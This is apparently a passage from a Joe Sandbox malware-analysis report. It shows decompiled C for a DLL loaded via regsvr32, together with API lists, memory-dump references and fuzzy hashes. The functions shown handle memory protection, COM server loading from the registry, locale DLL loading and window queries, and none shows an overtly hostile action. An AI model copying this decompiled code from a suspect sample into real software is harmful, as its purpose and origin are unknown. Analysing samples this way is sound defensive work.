				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E10010B20(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x1004f3e0; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x1004f3e0; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}

0x10010844
0x10010845
0x1001084a
0x1001085b
0x100108d4
0x100108d4
0x1001085d
0x1001085d
0x10010864
0x1001086a
0x1001086d
0x10010879
0x10010880
0x1001088b
0x1001088f
0x10010892
0x00000000
0x10010894
0x10010897
0x100108f5
0x00000000
0x10010899
0x10010899
0x100108a1
0x100108b7
0x100108bd
0x00000000
0x100108bf
0x100108c3
0x100108c6
0x100108c9
0x100108d2
0x100108da
0x100108dc
0x100108dc
0x100108e8
0x100108ee
0x100108f8
0x100108fb
0x1001090e
0x00000000
0x00000000
0x00000000
0x100108cb
0x100108cd
0x100108cd
0x100108c9
0x00000000
0x100108bd
0x00000000
0x100108a1
0x10010897
0x10010892
0x10010914
0x1001091b

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Virtual$Query$AllocInfoProtectSystem
String ID:
API String ID: 4136887677-0
Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90

Uniqueness

Uniqueness Score: -1.00%

Function 10025CEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10025CEC(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				void* _t25;
				struct HINSTANCE__* _t26;
				_Unknown_base(*)()* _t30;
				void* _t39;
				CHAR* _t40;
				void* _t42;
				signed int* _t43;
				void* _t44;
				void* _t46;

				E10011BF0(0x1003acec, _t46);
				_t43 =  *(_t46 + 0x10);
				 *_t43 =  *_t43 & 0x00000000;
				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t21 = E100243B2();
				_t38 =  *_t21;
				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
				 *(_t46 - 4) = 1;
				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
				_t40 =  *(_t46 + 0x10);
				if(_t25 != 0) {
					_t26 = LoadLibraryA(_t40);
					if(_t26 == 0) {
						goto L1;
					}
					_t30 = GetProcAddress(_t26, "DllGetClassObject");
					if(_t30 == 0) {
						_t44 = 0x800401f9;
					} else {
						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
					}
					L6:
					E100014B0(_t40 - 0x10, _t38);
					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t44;
				}
				L1:
				_t44 = 0x80040154;
				goto L6;
			}

0x10025cf1
0x10025cf8
0x10025cfb
0x10025d06
0x10025d0b
0x10025d0f
0x10025d14
0x10025d1e
0x10025d28
0x10025d2c
0x10025d33
0x10025d36
0x10025d40
0x10025d48
0x00000000
0x00000000
0x10025d50
0x10025d58
0x10025d67
0x10025d5a
0x10025d63
0x10025d63
0x10025d6c
0x10025d6f
0x10025d7a
0x10025d86
0x10025d8e
0x10025d8e
0x10025d38
0x10025d38
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10025CF1

Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5

Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5

LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50

Strings

DllGetClassObject, xrefs: 10025D4A

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
String ID: DllGetClassObject
API String ID: 821125782-1075368562
Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 100348C4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
librarystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;

				_t22 = __esi;
				_t20 = __ecx;
				_t19 = __ebx;
				_t27 = _a8 - 0x800;
				_t10 =  *0x1004c470; // 0xf256d946
				_v8 = _t10;
				if(_a8 != 0x800) {
					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t22);
					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E100117AE(_t12, _v8);
			}

0x100348c4
0x100348c4
0x100348c4
0x100348cd
0x100348d4
0x100348d9
0x100348df
0x10034930
0x10034932
0x00000000
0x00000000
0x10034934
0x100348e1
0x100348e7
0x100348ed
0x100348ed
0x10034902
0x1003490d
0x10034936
0x10034936
0x10034913
0x1003491a
0x1003491a
0x10034938
0x10034942

APIs

lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
LoadLibraryA.KERNEL32(?), ref: 1003491A
GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A

Strings

LOC, xrefs: 100348E1

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: InfoLibraryLoadLocalelstrcpy
String ID: LOC
API String ID: 864663389-519433814
Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90

Uniqueness

Uniqueness Score: -1.00%

Function 10007AE5 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10007AE5(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000799F() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E10007A99( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x1004edfc(_a4, _a8);
			}

0x10007af2
0x10007b06
0x10007b1a
0x10007b32
0x10007b1c
0x10007b23
0x10007b23
0x10007b3a
0x00000000
0x10007b3c
0x00000000
0x10007b43
0x10007b3a
0x00000000
0x10007b08
0x00000000

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
Instruction ID: 3a21d875c7eeece48a0e685930edcd66bc13eb96913376d54ee1399e2fea6754
Opcode Fuzzy Hash: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
Instruction Fuzzy Hash: DFF0C935A04119ABEB02EF61CC49EAE7FA9FB042C4B408025FD1AD506ADB38DA559B61

Uniqueness

Uniqueness Score: -1.00%

Function 10001090 Relevance: 4.5, APIs: 3, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001090() {
				char _v8;
				char _t12;
				intOrPtr* _t16;
				signed int _t18;

				_t18 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v8, 7) == 0) {
					L5:
					return GetACP();
				} else {
					_t12 = _v8;
					_t16 =  &_v8;
					if(_t12 == 0) {
						goto L5;
					} else {
						do {
							_t16 = _t16 + 1;
							_t18 = _t12 + (_t18 + _t18 * 4) * 2 - 0x30;
							_t12 =  *_t16;
						} while (_t12 != 0);
						if(_t18 != 0) {
							return _t18;
						} else {
							goto L5;
						}
					}
				}
			}

0x10001094
0x100010b1
0x100010d5
0x100010df
0x100010b3
0x100010b3
0x100010b9
0x100010bd
0x00000000
0x100010c0
0x100010c0
0x100010c6
0x100010c7
0x100010cb
0x100010cd
0x100010d3
0x100010e6
0x00000000
0x00000000
0x00000000
0x100010d3
0x100010bd

APIs

GetThreadLocale.KERNEL32 ref: 10001096
GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 100010A9
GetACP.KERNEL32 ref: 100010D5

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
Instruction ID: 26a1fdc9c2cb66cfcd8947c1f0583feeb1697c74baf4304ef7dc7fad7aa6cfc5
Opcode Fuzzy Hash: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
Instruction Fuzzy Hash: 3BF0E2366002B09AEE02DF61EC44ADB3BA4EF04BC1F814548EDC59B105E660AA0AC7E2

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB7F Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E1000DB7F(signed int* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t240;
				intOrPtr* _t241;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t260;
				signed int _t263;
				signed int _t267;
				void* _t272;
				void* _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				void* _t304;
				intOrPtr* _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t319;
				signed int* _t320;
				intOrPtr _t342;
				signed int _t346;
				signed int _t359;
				signed int _t390;
				signed int _t392;
				signed int _t396;
				void* _t402;
				signed int _t405;
				signed int _t408;
				signed int _t410;
				signed int _t414;
				void* _t416;
				signed int _t418;
				signed int _t422;
				void* _t423;
				signed int _t427;
				signed int _t430;
				void* _t432;
				void* _t434;
				intOrPtr _t435;
				signed int _t439;

				E10011BF0(0x1003af23, _t432);
				_t435 = _t434 - 0x54;
				_t240 =  *0x1004c470; // 0xf256d946
				 *(_t432 - 0x3c) =  *(_t432 - 0x3c) & 0x00000000;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t320 = __ecx;
				 *((intOrPtr*)(_t432 - 0x14)) = _t240;
				 *((intOrPtr*)(_t432 - 0x10)) = _t435;
				 *((intOrPtr*)(_t432 - 0x48)) = __ecx;
				asm("movsd");
				 *((char*)(_t432 - 0x3d)) = 0;
				_t241 =  *((intOrPtr*)(_t432 + 8));
				 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
				_t418 =  *((intOrPtr*)( *_t241))(_t241, 0x10040644, _t432 - 0x3c, _t402, _t416, _t319);
				if(_t418 >= 0) {
					_t419 = __ecx + 0x14;
					__eflags =  *_t419;
					 *(_t432 - 0x2c) = 0;
					if( *_t419 != 0) {
						 *((char*)(__ecx + 0x1c)) = 1;
						goto L13;
					} else {
						 *(_t432 - 0x28) = 0;
						_t311 =  *((intOrPtr*)(_t432 + 8));
						 *(_t432 - 4) = 1;
						_t312 =  *((intOrPtr*)( *_t311))(_t311, 0x10040624, _t432 - 0x28);
						 *(_t432 - 0x38) = _t312;
						__eflags = _t312;
						_t313 =  *(_t432 - 0x28);
						if(_t312 >= 0) {
							_t314 =  *((intOrPtr*)( *_t313 + 0xc))(_t313, __ecx + 0xc, _t419, __ecx + 0x18);
							_t419 = _t314;
							__eflags = _t314;
							_t315 =  *(_t432 - 0x28);
							 *(_t432 - 4) = 0;
							if(_t314 >= 0) {
								__eflags = _t315;
								 *((char*)(__ecx + 0x1c)) = 0;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L13:
								 *(_t432 - 0x34) = 0;
								 *(_t432 - 4) = 2;
								 *(_t432 - 0x34) = E1001F77E(_t320[3] * 0x34);
								 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
								__eflags =  *(_t432 - 0x34);
								if( *(_t432 - 0x34) != 0) {
									 *(_t432 - 4) = 4;
									_t320[4] = E1001F77E(_t320[3]);
									_t405 = 0;
									__eflags = _t320[4];
									 *(_t432 - 4) = 0;
									if(__eflags != 0) {
										 *(_t432 - 0x30) =  *(_t432 - 0x34);
										 *(_t432 - 0x38) = 0;
										while(1) {
											__eflags = _t405 - _t320[3];
											if(_t405 >= _t320[3]) {
												break;
											}
											 *((char*)(_t405 + _t320[4])) = 0;
											_t410 = _t405 + _t405 * 2 << 4;
											_t272 = _t320[5] + _t410;
											__eflags =  *(_t272 + 0x10) - _t320[9];
											if( *(_t272 + 0x10) <= _t320[9]) {
												L41:
												_t342 =  *((intOrPtr*)(_t272 + 0x14));
												__eflags = _t342 - 0xd;
												if(_t342 != 0xd) {
													__eflags = _t342 - 0x81;
													if(_t342 == 0x81) {
														_t156 = _t272 + 0x10;
														 *_t156 =  *(_t272 + 0x10) + 1;
														__eflags =  *_t156;
													}
													_t274 = _t320[5] + _t410;
													__eflags =  *((short*)(_t274 + 0x14)) - 0x82;
													if( *((short*)(_t274 + 0x14)) == 0x82) {
														 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) +  *((intOrPtr*)(_t274 + 0x10)) + 2;
													}
													_t276 = _t320[5] + _t410;
													__eflags = _t276;
													 *(_t432 - 0x28) = _t276;
													_t278 = E10009FD2( *(_t276 + 0x14) & 0x0000ffff);
													_push(0);
													goto L55;
												} else {
													 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
													 *(_t432 - 4) = 8;
													 *(_t432 - 0x44) = E1001F77E(0x14);
													 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
													__eflags =  *(_t432 - 0x44);
													if( *(_t432 - 0x44) != 0) {
														goto L49;
													} else {
														_t414 =  *(_t432 - 0x38);
														__eflags = _t414;
														if(__eflags > 0) {
															_t427 =  *(_t432 - 0x34) + 0x14;
															__eflags = _t427;
															do {
																_push( *_t427);
																L1001F7A9(_t320, _t414, _t427, __eflags);
																_t427 = _t427 + 0x34;
																_t414 = _t414 - 1;
																__eflags = _t414;
															} while (__eflags != 0);
														}
														goto L47;
													}
												}
											} else {
												__eflags =  *((short*)(_t272 + 0x14)) - 0xd;
												if( *((short*)(_t272 + 0x14)) == 0xd) {
													goto L41;
												} else {
													_t359 = _t320[8];
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														__eflags = _t359 - 1;
														if(_t359 != 1) {
															__eflags =  *((char*)(_t432 - 0x3d));
															if(__eflags == 0) {
																_t419 = 0;
																 *((intOrPtr*)(_t432 - 0x5c)) = 0x89;
																 *((intOrPtr*)(_t432 - 0x58)) = 0x8b;
																 *(_t432 - 0x50) = 0;
																 *(_t432 - 0x4c) = 0;
																E1000DAA7(_t320, _t410, 0, __eflags,  *((intOrPtr*)(_t432 + 8)), _t432 - 0x5c, _t432 - 0x50, 2);
																__eflags =  *(_t432 - 0x50);
																if( *(_t432 - 0x50) == 0) {
																	__eflags =  *(_t432 - 0x4c);
																	if( *(_t432 - 0x4c) != 0) {
																		_t419 = 0x1004079c;
																		goto L32;
																	}
																} else {
																	_t419 = 0x100407ac;
																	L32:
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																}
																 *((char*)(_t432 - 0x3d)) = 1;
															}
															 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
															 *(_t432 - 4) = 6;
															 *(_t432 - 0x44) = E1001F77E(0x14);
															 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
															__eflags =  *(_t432 - 0x44);
															if( *(_t432 - 0x44) != 0) {
																L49:
																 *( *(_t432 - 0x44)) =  *( *(_t432 - 0x44)) & 0x00000000;
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t410 =  *(_t432 - 0x38) +  *(_t432 - 0x38) * 2 << 4;
																 *((short*)(_t320[5] + _t410 + 0x14)) = 0xd;
																 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
																 *(_t432 - 0x28) = _t320[5] + _t410;
																_t278 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
																_push( *(_t432 - 0x44));
																L55:
																_t169 =  *(_t432 - 0x2c) - 1; // -1
																_t419 = _t278 + _t169 &  !(_t278 - 1);
																_t281 =  *(_t432 - 0x28);
																_t346 =  *((intOrPtr*)(_t281 + 0x10)) + _t419 + 0x00000003 & 0xfffffffc;
																_t390 = _t346 + 0x00000007 & 0xfffffffc;
																_push(_t390);
																_push(_t346);
																_push(_t419);
																_push(0);
																 *(_t432 - 0x2c) = _t390;
																 *(_t432 - 0x2c) =  *(_t432 - 0x2c) + 4;
																 *(_t432 - 0x28) = _t390;
																_push(0);
																_push(0);
																_push( *((intOrPtr*)(_t281 + 0x10)));
																__eflags = 0;
																_push(0);
																_push( *((intOrPtr*)(_t281 + 8)));
																_push( *(_t432 - 0x30));
																E10009E21();
																_t435 = _t435 + 0x30;
																goto L56;
															} else {
																_t414 =  *(_t432 - 0x38);
																__eflags = _t414;
																if(__eflags > 0) {
																	_t430 =  *(_t432 - 0x34) + 0x14;
																	__eflags = _t430;
																	do {
																		_push( *_t430);
																		L1001F7A9(_t320, _t414, _t430, __eflags);
																		_t430 = _t430 + 0x34;
																		_t414 = _t414 - 1;
																		__eflags = _t414;
																	} while (__eflags != 0);
																}
																L47:
																_push( *(_t432 - 0x34));
																L1001F7A9(_t320, _t414, _t419, __eflags);
																_push(_t320[4]);
																L1001F7A9(_t320, _t414, _t419, __eflags);
																_t320[4] = _t320[4] & 0x00000000;
																goto L15;
															}
														} else {
															 *(_t272 + 0x15) =  *(_t272 + 0x15) | 0x00000040;
															 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
															 *((char*)( *(_t432 - 0x38) + _t320[4])) = 1;
															 *(_t432 - 0x28) = _t320[5] + _t410;
															_t304 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
															_t90 =  *(_t432 - 0x2c) - 1; // -1
															_t419 = _t304 + _t90 &  !(_t304 - 1);
															_t392 = ( *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc) + 0x00000007 & 0xfffffffc;
															 *(_t432 - 0x28) = _t392;
															 *(_t432 - 0x2c) = _t392 + 4;
															E10009F01( *(_t432 - 0x30),  *((intOrPtr*)( *(_t432 - 0x28) + 8)), 0,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)), 0, 0, 0, _t419,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 0);
															_t435 = _t435 + 0x38;
															goto L56;
														}
													} else {
														_t67 = ( *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc) + 7; // 0x8
														_t396 = _t67 & 0xfffffffc;
														 *(_t432 - 0x28) = _t396;
														 *(_t432 - 0x2c) = _t396 + 4;
														_t419 = 0;
														E10009F01( *(_t432 - 0x30),  *((intOrPtr*)(_t272 + 8)), 0,  *(_t272 + 0x10), 0, 0, 0, 0,  *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 1);
														_t435 = _t435 + 0x34;
														L56:
														 *(_t432 - 0x30) =  *(_t432 - 0x30) + 0x34;
														 *(_t432 - 0x38) =  *(_t432 - 0x38) + 1;
														 *(_t320[5] + _t410 + 4) = _t419;
														_t405 =  *(_t432 - 0x38);
														continue;
													}
												}
											}
											goto L85;
										}
										__eflags =  *_t320;
										if( *_t320 != 0) {
											L67:
											_t320[2] = _t320[2] & 0x00000000;
											 *(_t432 - 4) = 0xa;
											_t320[2] = E1001F77E( *(_t432 - 0x2c));
											_t249 = _t320[2];
											_t405 = 0;
											__eflags = _t249;
											 *(_t432 - 4) = 0;
											if(_t249 != 0) {
												E10011C50(_t249, 0,  *(_t432 - 0x2c));
												_t418 = E10009DD7( *(_t432 - 0x34), _t320[3],  *_t320,  *(_t432 - 0x2c),  *(_t432 - 0x3c));
												__eflags = _t418;
												if(__eflags < 0) {
													_push(_t320[4]);
													L1001F7A9(_t320, 0, _t418, __eflags);
													_t320[4] = 0;
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t418, __eflags);
												goto L81;
											} else {
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t422 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t422;
													do {
														_push( *_t422);
														L1001F7A9(_t320, _t405, _t422, __eflags);
														_t405 = _t405 + 1;
														_t422 = _t422 + 0x34;
														__eflags = _t405 - _t320[3];
													} while (__eflags < 0);
													_t405 = 0;
													__eflags = 0;
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t419, __eflags);
												_push(_t320[4]);
												L1001F7A9(_t320, _t405, _t419, __eflags);
												_t320[4] = _t405;
												goto L74;
											}
										} else {
											_push(1);
											_t263 = E10009D73(_t320);
											__eflags = _t263;
											 *(_t432 - 0x38) = _t263;
											if(_t263 >= 0) {
												 *((char*)( *_t320 + 4)) = 1;
												goto L67;
											} else {
												_t423 = 0;
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t408 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t408;
													do {
														_push( *_t408);
														L1001F7A9(_t320, _t408, _t423, __eflags);
														_t423 = _t423 + 1;
														_t408 = _t408 + 0x34;
														__eflags = _t423 - _t320[3];
													} while (__eflags < 0);
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t423, __eflags);
												_push(_t320[4]);
												L1001F7A9(_t320, _t405, _t423, __eflags);
												_t267 =  *(_t432 - 0x3c);
												_t320[4] = _t320[4] & 0x00000000;
												 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
												__eflags = _t267;
												goto L63;
											}
										}
									} else {
										_push( *(_t432 - 0x34));
										L1001F7A9(_t320, 0, _t419, __eflags);
										L74:
										_t260 =  *(_t432 - 0x3c);
										 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
										__eflags = _t260 - _t405;
										goto L75;
									}
								} else {
									L15:
									_t260 =  *(_t432 - 0x3c);
									 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
									__eflags = _t260;
									L75:
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t260 + 8))(_t260);
									}
									_t254 = 0x8007000e;
								}
							} else {
								__eflags = _t315;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L81:
								_t253 =  *(_t432 - 0x3c);
								 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
								__eflags = _t253 - _t405;
								goto L82;
							}
						} else {
							__eflags = _t313;
							 *(_t432 - 4) = 0;
